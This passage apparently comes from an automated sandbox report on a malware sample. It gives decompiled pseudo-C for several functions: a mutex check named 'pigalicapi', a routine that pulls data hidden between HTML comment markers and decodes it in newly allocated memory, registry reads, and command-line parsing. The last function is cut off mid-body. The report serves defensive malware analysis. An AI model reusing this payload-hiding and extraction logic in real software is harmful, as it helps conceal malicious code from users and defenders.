                                                                                                                                                                                                                                                                          • API String ID: 3239643929-0
                                                                                                                                                                                                                                                                          • Opcode ID: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                          • Instruction ID: c08fe1bd30c15a7bb6e8476d185febfb1ca0f6f7539b963f039c2b10503cc3e6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB818574A00209EFDB04CF94C890B9EBBB5FF88354F248198E959AB355D774EE81CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005E00() {
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                                          				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                                          			}



                                                                                                                                                                                                                                                                          0x04005e0c
                                                                                                                                                                                                                                                                          0x04005e25

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                          • String ID: pigalicapi
                                                                                                                                                                                                                                                                          • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                                          • Opcode ID: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                          • Instruction ID: c9a096dff23d34124f73a3e8575822b5ba186ec69b5811b6053c60030017a183
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac3ade5f6374e6b3d28c260e8624ddfb09fc106c0a6a63d5b6af1bc4c66bd4e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAC08C362883186BF2081B61ED4BB893A88C792E81F600030F30AEA0D0999968C08B16
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				char _t48;
                                                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                                                          				char _t63;
                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_v20 = _a4;
                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                          					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                                          						_v32 = _t48;
                                                                                                                                                                                                                                                                          						_t63 =  *0x400c700; // 0x0
                                                                                                                                                                                                                                                                          						_v28 = _t63;
                                                                                                                                                                                                                                                                          						_t51 = E04007AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                                          						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                                          						_v24 = _t51;
                                                                                                                                                                                                                                                                          						if(_v24 == 0) {
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                                          							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                                          							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                                          							if(_v36 != 0) {
                                                                                                                                                                                                                                                                          								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                                          								_t58 = E04008090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                                          								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                                          								_v40 = _t58;
                                                                                                                                                                                                                                                                          								if(_v40 > 0) {
                                                                                                                                                                                                                                                                          									_v13 = 1;
                                                                                                                                                                                                                                                                          									_v8 = _v40;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L16:
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x04008256
                                                                                                                                                                                                                                                                          0x04008261
                                                                                                                                                                                                                                                                          0x04008285
                                                                                                                                                                                                                                                                          0x0400828f
                                                                                                                                                                                                                                                                          0x04008292
                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                          0x040082b1
                                                                                                                                                                                                                                                                          0x040082b6
                                                                                                                                                                                                                                                                          0x040082b9
                                                                                                                                                                                                                                                                          0x040082bf
                                                                                                                                                                                                                                                                          0x040082d6
                                                                                                                                                                                                                                                                          0x040082db
                                                                                                                                                                                                                                                                          0x040082de
                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                          0x040082e7
                                                                                                                                                                                                                                                                          0x040082ed
                                                                                                                                                                                                                                                                          0x040082fb
                                                                                                                                                                                                                                                                          0x04008306
                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                          0x04008318
                                                                                                                                                                                                                                                                          0x0400832e
                                                                                                                                                                                                                                                                          0x04008333
                                                                                                                                                                                                                                                                          0x04008336
                                                                                                                                                                                                                                                                          0x0400833d
                                                                                                                                                                                                                                                                          0x0400833f
                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                          0x04008346
                                                                                                                                                                                                                                                                          0x0400834f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400835a
                                                                                                                                                                                                                                                                          0x0400830d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040082e5
                                                                                                                                                                                                                                                                          0x04008296
                                                                                                                                                                                                                                                                          0x0400835f
                                                                                                                                                                                                                                                                          0x04008365

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000004,-->), ref: 04008300
                                                                                                                                                                                                                                                                            • Part of subcall function 04008090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID: -->$<!--
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                                          • Opcode ID: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                          • Instruction ID: 33a7bc7995a4c535701f75233fb1c46eed47e0fb0959c3fa2371b97aa1c284c8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20dc3e6302552aac322e9474528943c8a2bb7ec5e025690798da4dc1e387ebc2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23311971900249DFEF04EFA8C544BEEBBB1BB88308F14C959D505B7281E774AA84CB96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                                                                                                          			E0040216C(void* __edx, char _a4) {
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				signed short _v52;
                                                                                                                                                                                                                                                                          				signed char _v56;
                                                                                                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                                                                                                          				signed int _v116;
                                                                                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v124;
                                                                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t17;
                                                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA* _t23;
                                                                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                                                                                          				struct HINSTANCE__** _t34;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t25 = __edx;
                                                                                                                                                                                                                                                                          				_t23 =  &_a4;
                                                                                                                                                                                                                                                                          				_push( *((intOrPtr*)(_t23 - 4)));
                                                                                                                                                                                                                                                                          				_t34 = (_t32 & 0xfffffff0) - 0x6c;
                                                                                                                                                                                                                                                                          				E00402148(_t13);
                                                                                                                                                                                                                                                                          				_t21 = GetCommandLineA();
                                                                                                                                                                                                                                                                          				 *_t34 =  &_v100;
                                                                                                                                                                                                                                                                          				GetStartupInfoA(_t23);
                                                                                                                                                                                                                                                                          				_push(_t23);
                                                                                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                          						_t19 =  *_t21;
                                                                                                                                                                                                                                                                          						if(_t19 != 0x20 && _t19 != 9) {
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_t19 != 0x22) {
                                                                                                                                                                                                                                                                          						while(_t19 != 0) {
                                                                                                                                                                                                                                                                          							_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                          							_t19 =  *_t21;
                                                                                                                                                                                                                                                                          							if(_t19 == 0x20) {
                                                                                                                                                                                                                                                                          								_t19 = 0x20;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								if(_t19 == 9) {
                                                                                                                                                                                                                                                                          									_t19 = 9;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                          							_t19 =  *_t21;
                                                                                                                                                                                                                                                                          							if(_t19 == 0x22) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if(_t19 != 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                          						_t19 =  *_t21;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                          					if(_t19 == 0x20 || _t19 == 9) {
                                                                                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if((_v56 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                          					_t27 = 0xa;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t27 = _v52 & 0x0000ffff;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				 *_t34 = 0;
                                                                                                                                                                                                                                                                          				_t17 = GetModuleHandleA(??);
                                                                                                                                                                                                                                                                          				_push(_t25);
                                                                                                                                                                                                                                                                          				_v116 = _t27;
                                                                                                                                                                                                                                                                          				_v120 = _t21;
                                                                                                                                                                                                                                                                          				_v124 = 0;
                                                                                                                                                                                                                                                                          				 *_t34 = _t17; // executed
                                                                                                                                                                                                                                                                          				_t18 = E004015A6(); // executed
                                                                                                                                                                                                                                                                          				return _t18;
                                                                                                                                                                                                                                                                          			}




















                                                                                                                                                                                                                                                                          0x0040216c
                                                                                                                                                                                                                                                                          0x0040216c
                                                                                                                                                                                                                                                                          0x00402173
                                                                                                                                                                                                                                                                          0x0040217c
                                                                                                                                                                                                                                                                          0x0040217f
                                                                                                                                                                                                                                                                          0x00402189
                                                                                                                                                                                                                                                                          0x0040218e
                                                                                                                                                                                                                                                                          0x00402191
                                                                                                                                                                                                                                                                          0x00402196
                                                                                                                                                                                                                                                                          0x00402199
                                                                                                                                                                                                                                                                          0x0040219c
                                                                                                                                                                                                                                                                          0x0040219c
                                                                                                                                                                                                                                                                          0x004021a0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021a6
                                                                                                                                                                                                                                                                          0x004021a6
                                                                                                                                                                                                                                                                          0x004021ae
                                                                                                                                                                                                                                                                          0x004021bf
                                                                                                                                                                                                                                                                          0x004021b4
                                                                                                                                                                                                                                                                          0x004021b5
                                                                                                                                                                                                                                                                          0x004021b9
                                                                                                                                                                                                                                                                          0x00402224
                                                                                                                                                                                                                                                                          0x004021bb
                                                                                                                                                                                                                                                                          0x004021bd
                                                                                                                                                                                                                                                                          0x00402228
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021bd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021b9
                                                                                                                                                                                                                                                                          0x004021b0
                                                                                                                                                                                                                                                                          0x004021cc
                                                                                                                                                                                                                                                                          0x004021cc
                                                                                                                                                                                                                                                                          0x004021cd
                                                                                                                                                                                                                                                                          0x004021d1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021ca
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021ca
                                                                                                                                                                                                                                                                          0x004021d4
                                                                                                                                                                                                                                                                          0x004021d4
                                                                                                                                                                                                                                                                          0x004021d5
                                                                                                                                                                                                                                                                          0x004021d5
                                                                                                                                                                                                                                                                          0x004021d7
                                                                                                                                                                                                                                                                          0x004021d9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x004021d9
                                                                                                                                                                                                                                                                          0x004021e3
                                                                                                                                                                                                                                                                          0x0040221c
                                                                                                                                                                                                                                                                          0x004021e5
                                                                                                                                                                                                                                                                          0x004021e5
                                                                                                                                                                                                                                                                          0x004021e5
                                                                                                                                                                                                                                                                          0x004021e9
                                                                                                                                                                                                                                                                          0x004021f0
                                                                                                                                                                                                                                                                          0x004021f5
                                                                                                                                                                                                                                                                          0x004021f6
                                                                                                                                                                                                                                                                          0x004021fa
                                                                                                                                                                                                                                                                          0x004021fe
                                                                                                                                                                                                                                                                          0x00402206
                                                                                                                                                                                                                                                                          0x00402209
                                                                                                                                                                                                                                                                          0x0040221b

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CommandHandleInfoLineModuleStartup
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1628297973-0
                                                                                                                                                                                                                                                                          • Opcode ID: dea9fb60a0e8c7139b7ad21b8fadcfed2fa973cf111aefb73716ac7d3e57f3bb
                                                                                                                                                                                                                                                                          • Instruction ID: a58904cd742006e8efc07750f74eda1fc12795c36ac70e21e41bb3de5e0fdb65
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dea9fb60a0e8c7139b7ad21b8fadcfed2fa973cf111aefb73716ac7d3e57f3bb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15112B3580424499DF251BA98B8D3AABBA0AB17304F94417BDEE03F2C5D2FC0883D65F
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E0400A400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v12 = 0x80000002;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                          					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                          					if(_t25 == 0) {
                                                                                                                                                                                                                                                                          						_v20 = _a16;
                                                                                                                                                                                                                                                                          						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                                          						if(_t27 == 0) {
                                                                                                                                                                                                                                                                          							_v8 = _v20;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x0400a406
                                                                                                                                                                                                                                                                          0x0400a411
                                                                                                                                                                                                                                                                          0x0400a429
                                                                                                                                                                                                                                                                          0x0400a439
                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                          0x0400a43b
                                                                                                                                                                                                                                                                          0x0400a442
                                                                                                                                                                                                                                                                          0x0400a45c
                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                          0x0400a469
                                                                                                                                                                                                                                                                          0x0400a480
                                                                                                                                                                                                                                                                          0x0400a488
                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                          0x0400a48d
                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                          0x0400a494
                                                                                                                                                                                                                                                                          0x0400a464
                                                                                                                                                                                                                                                                          0x0400a4a0

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                          • Opcode ID: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                          • Instruction ID: 715db8aa4ed00a9f1925e7802d1785fb3623660146ed6b0049a8ef53f9c2d8f0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26c5e8be6951219e5415309ce84e58fa5b755f2e54e0236dd9c9ae8c1af765fa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70110D74A00309EBEB15CF94C848BEF77B8FB84744F14C558E914AB680D7B8AA51CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProcWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 181713994-0
                                                                                                                                                                                                                                                                          • Opcode ID: dce17d3ab1834a14d6dd11c000d5e6f7c04496a4c416f1c2b268dd238bca021c
                                                                                                                                                                                                                                                                          • Instruction ID: 1be99baf301fddce28c76e53022f88f5968e2be15515bd70b970bf4d0b2c5684
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dce17d3ab1834a14d6dd11c000d5e6f7c04496a4c416f1c2b268dd238bca021c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66010C7070A2048BEB11AE6CC18536E76A5FB04744F10483BF886E73E1D2BCD9819F9B
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr* _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                          				void* _t71;
                                                                                                                                                                                                                                                                          				intOrPtr _t73;
                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v16 = _a8;
                                                                                                                                                                                                                                                                          					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t71;
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_t73 = E04001390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                                          						_v20 = _t73;
                                                                                                                                                                                                                                                                          						if(_v20 != 0) {
                                                                                                                                                                                                                                                                          							_v24 = _v12;
                                                                                                                                                                                                                                                                          							_v28 = _v20;
                                                                                                                                                                                                                                                                          							_v32 = E040087B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                                          							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                                          								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                                          								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                                          								_v36 = E040016F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                                          								if(_v36 == _v44) {
                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                                          									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                                          									E04008630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                                          									_v52 = _v28 - _v48 + 0x10;
